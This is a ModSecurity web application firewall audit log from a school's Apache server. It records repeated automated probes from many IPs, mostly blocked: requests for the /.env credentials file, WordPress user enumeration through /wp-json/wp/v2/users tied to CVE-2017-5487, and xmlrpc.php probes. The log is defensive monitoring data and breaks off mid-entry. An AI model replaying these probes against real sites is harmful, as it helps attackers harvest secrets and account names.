Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4ae4a162-Z-- --4dac9544-A-- [05/May/2025:22:39:27 +0700] aBjbr4ZWvR7-42f6JrAHiQAAAMU 103.236.140.4 56930 103.236.140.4 8181 --4dac9544-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.103.80 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.103.80 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --4dac9544-C-- demo.sayHello --4dac9544-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --4dac9544-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746459567825356 5501 (- - -) Stopwatch2: 1746459567825356 5501; combined=4230, p1=501, p2=3503, p3=31, p4=35, p5=94, sr=74, sw=66, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4dac9544-Z-- --17d6ab44-A-- [05/May/2025:22:39:44 +0700] aBjbwIZWvR7-42f6JrAHogAAAMY 103.236.140.4 57080 103.236.140.4 8181 --17d6ab44-B-- GET /.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 45.144.212.193 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 45.144.212.193 X-Forwarded-Proto: http Connection: close User-agent: Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30 Accept: */* --17d6ab44-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --17d6ab44-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746459584677849 798 (- - -) Stopwatch2: 1746459584677849 798; combined=314, p1=273, p2=0, p3=0, p4=0, p5=40, sr=74, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --17d6ab44-Z-- --b5a2dd0c-A-- [05/May/2025:22:39:48 +0700] aBjbxIZWvR7-42f6JrAHpQAAAMQ 103.236.140.4 57114 103.236.140.4 8181 --b5a2dd0c-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 45.201.11.148 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 45.201.11.148 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --b5a2dd0c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b5a2dd0c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746459588020692 2496 (- - -) Stopwatch2: 1746459588020692 2496; combined=1147, p1=369, p2=751, p3=0, p4=0, p5=27, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b5a2dd0c-Z-- --d3c4f701-A-- [05/May/2025:22:39:50 +0700] aBjbxk2V_h1VFAgsfgZ3-QAAAAY 103.236.140.4 57150 103.236.140.4 8181 --d3c4f701-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 45.201.11.148 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 45.201.11.148 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --d3c4f701-C-- demo.sayHello --d3c4f701-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --d3c4f701-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746459590815473 5791 (- - -) Stopwatch2: 1746459590815473 5791; combined=4670, p1=571, p2=3861, p3=40, p4=44, p5=92, sr=74, sw=62, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d3c4f701-Z-- --d67f7415-A-- [05/May/2025:22:40:31 +0700] aBjb702V_h1VFAgsfgZ4DgAAABU 103.236.140.4 57500 103.236.140.4 8181 --d67f7415-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.249.59.22 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.59.22 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --d67f7415-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d67f7415-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746459631949404 2501 (- - -) Stopwatch2: 1746459631949404 2501; combined=1283, p1=438, p2=817, p3=0, p4=0, p5=28, sr=114, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d67f7415-Z-- --e4368215-A-- [05/May/2025:22:40:33 +0700] aBjb8fZJDMuQndL03JNWvwAAAFI 103.236.140.4 57524 103.236.140.4 8181 --e4368215-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.125.229 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.125.229 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --e4368215-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e4368215-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746459633781755 2414 (- - -) Stopwatch2: 1746459633781755 2414; combined=1131, p1=379, p2=723, p3=0, p4=0, p5=29, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e4368215-Z-- --870f372c-A-- [05/May/2025:22:40:34 +0700] aBjb8vZJDMuQndL03JNWwgAAAFE 103.236.140.4 57534 103.236.140.4 8181 --870f372c-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.249.59.22 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.59.22 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --870f372c-C-- demo.sayHello --870f372c-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --870f372c-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746459634855465 5333 (- - -) Stopwatch2: 1746459634855465 5333; combined=4005, p1=501, p2=3295, p3=29, p4=30, p5=88, sr=73, sw=62, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --870f372c-Z-- --dc72f267-A-- [05/May/2025:22:40:36 +0700] aBjb9ARwKNFSM6B7_LacDAAAAIY 103.236.140.4 57552 103.236.140.4 8181 --dc72f267-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.125.229 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.125.229 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --dc72f267-C-- demo.sayHello --dc72f267-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --dc72f267-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746459636578468 4608 (- - -) Stopwatch2: 1746459636578468 4608; combined=3624, p1=426, p2=3004, p3=22, p4=24, p5=87, sr=66, sw=61, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --dc72f267-Z-- --1846586f-A-- [05/May/2025:22:40:43 +0700] aBjb-4ZWvR7-42f6JrAHtAAAANA 103.236.140.4 57624 103.236.140.4 8181 --1846586f-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.249.57.217 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.57.217 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --1846586f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1846586f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746459643824757 2516 (- - -) Stopwatch2: 1746459643824757 2516; combined=1470, p1=476, p2=962, p3=0, p4=0, p5=32, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1846586f-Z-- --d271693b-A-- [05/May/2025:22:40:45 +0700] aBjb_YZWvR7-42f6JrAHtwAAANM 103.236.140.4 57632 103.236.140.4 8181 --d271693b-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.164.66 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.164.66 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --d271693b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d271693b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746459645225914 1923 (- - -) Stopwatch2: 1746459645225914 1923; combined=1002, p1=330, p2=646, p3=0, p4=0, p5=26, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d271693b-Z-- --50a0dc3f-A-- [05/May/2025:22:40:46 +0700] aBjb_oZWvR7-42f6JrAHugAAAMc 103.236.140.4 57646 103.236.140.4 8181 --50a0dc3f-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.249.57.217 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.57.217 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --50a0dc3f-C-- demo.sayHello --50a0dc3f-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --50a0dc3f-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746459646551618 6232 (- - -) Stopwatch2: 1746459646551618 6232; combined=4386, p1=523, p2=3605, p3=34, p4=35, p5=109, sr=86, sw=80, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --50a0dc3f-Z-- --72f44b31-A-- [05/May/2025:22:40:47 +0700] aBjb__ZJDMuQndL03JNWxgAAAE8 103.236.140.4 57656 103.236.140.4 8181 --72f44b31-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.164.66 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.164.66 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --72f44b31-C-- demo.sayHello --72f44b31-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --72f44b31-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746459647957369 5163 (- - -) Stopwatch2: 1746459647957369 5163; combined=3799, p1=447, p2=3140, p3=25, p4=28, p5=92, sr=70, sw=67, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --72f44b31-Z-- --298bcd6f-A-- [05/May/2025:22:40:54 +0700] aBjcBk2V_h1VFAgsfgZ4GQAAAA8 103.236.140.4 57720 103.236.140.4 8181 --298bcd6f-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.89.3 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.89.3 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --298bcd6f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --298bcd6f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746459654108687 3522 (- - -) Stopwatch2: 1746459654108687 3522; combined=1578, p1=560, p2=987, p3=0, p4=0, p5=31, sr=131, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --298bcd6f-Z-- --6033b536-A-- [05/May/2025:22:40:56 +0700] aBjcCE2V_h1VFAgsfgZ4HgAAAAE 103.236.140.4 57744 103.236.140.4 8181 --6033b536-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.233.89.3 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.89.3 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --6033b536-C-- demo.sayHello --6033b536-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --6033b536-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746459656843999 5725 (- - -) Stopwatch2: 1746459656843999 5725; combined=4179, p1=527, p2=3391, p3=32, p4=36, p5=125, sr=88, sw=68, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6033b536-Z-- --0979d848-A-- [05/May/2025:22:41:05 +0700] aBjcEfZJDMuQndL03JNW1QAAAEI 103.236.140.4 57816 103.236.140.4 8181 --0979d848-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.92.116 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.92.116 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --0979d848-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0979d848-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746459665684074 3215 (- - -) Stopwatch2: 1746459665684074 3215; combined=1436, p1=498, p2=907, p3=0, p4=0, p5=31, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0979d848-Z-- --c6d2ef13-A-- [05/May/2025:22:41:06 +0700] aBjcEoZWvR7-42f6JrAHxwAAAMc 103.236.140.4 57826 103.236.140.4 8181 --c6d2ef13-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.253.169.50 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.169.50 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --c6d2ef13-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c6d2ef13-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746459666783514 3661 (- - -) Stopwatch2: 1746459666783514 3661; combined=1650, p1=512, p2=1094, p3=0, p4=0, p5=44, sr=89, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c6d2ef13-Z-- --087c470d-A-- [05/May/2025:22:41:08 +0700] aBjcFARwKNFSM6B7_LacHAAAAJg 103.236.140.4 57844 103.236.140.4 8181 --087c470d-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.233.92.116 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.92.116 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --087c470d-C-- demo.sayHello --087c470d-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --087c470d-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746459668408802 5240 (- - -) Stopwatch2: 1746459668408802 5240; combined=3969, 